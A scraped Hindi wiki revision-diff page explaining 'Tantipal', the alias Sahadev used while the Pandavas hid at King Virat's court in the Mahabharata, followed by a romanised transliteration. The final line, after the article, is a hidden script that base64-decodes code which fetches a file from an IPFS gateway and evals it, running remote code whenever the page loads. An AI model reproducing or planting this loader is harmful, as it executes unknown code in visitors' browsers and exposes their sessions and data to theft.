Difference between revisions of "तन्तिपाल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('महाभारत में पांडवों के वनवास में एक वर्ष का...' के साथ नया पन्ना बनाया)
 
Line 2: Line 2:
  
 
'तस्य वाक्तन्तिर्नामानि दामानी' इस श्रुति के अनुसार तन्ति शब्द वाणी का वाचक है। तन्तिपाल कहकर [[सहदेव]] ने गूढ़रूप से [[युधिष्ठिर]] को यह बताया कि मैं आपकी प्रत्येक आशा का पालन करूँगा। साधारण लोगों की दृष्टि में तन्तिपाल का अर्थ है, बैलों को बाँधने की रस्सी को सुरक्षित रखने वाला। अत: सहदेव ने भी अपना परिचय यथार्थ ही दिया।
 
'तस्य वाक्तन्तिर्नामानि दामानी' इस श्रुति के अनुसार तन्ति शब्द वाणी का वाचक है। तन्तिपाल कहकर [[सहदेव]] ने गूढ़रूप से [[युधिष्ठिर]] को यह बताया कि मैं आपकी प्रत्येक आशा का पालन करूँगा। साधारण लोगों की दृष्टि में तन्तिपाल का अर्थ है, बैलों को बाँधने की रस्सी को सुरक्षित रखने वाला। अत: सहदेव ने भी अपना परिचय यथार्थ ही दिया।
 
+
==सम्बंधित लिंक==
 
{{महाभारत}}
 
{{महाभारत}}
 
[[Category:पौराणिक_कोश]]
 
[[Category:पौराणिक_कोश]]
 
[[Category:महाभारत]]
 
[[Category:महाभारत]]
 
__INDEX__
 
__INDEX__

Revision as of 07:27, 10 July 2010

mahabharat mean paandavoan ke vanavas mean ek varsh ka ajnat vas bhi tha jo unhoanne virat nagar mean bitaya. virat nagar mean paandav apana nam aur pahachan chhupakar rahe. inhoanne raja virat ke yahaan sevak banakar ek varsh bitaya.

'tasy vaktantirnamani damani' is shruti ke anusar tanti shabd vani ka vachak hai. tantipal kahakar sahadev ne goodharoop se yudhishthir ko yah bataya ki maian apaki pratyek asha ka palan karooanga. sadharan logoan ki drishti mean tantipal ka arth hai, bailoan ko baandhane ki rassi ko surakshit rakhane vala. at: sahadev ne bhi apana parichay yatharth hi diya.

sambandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>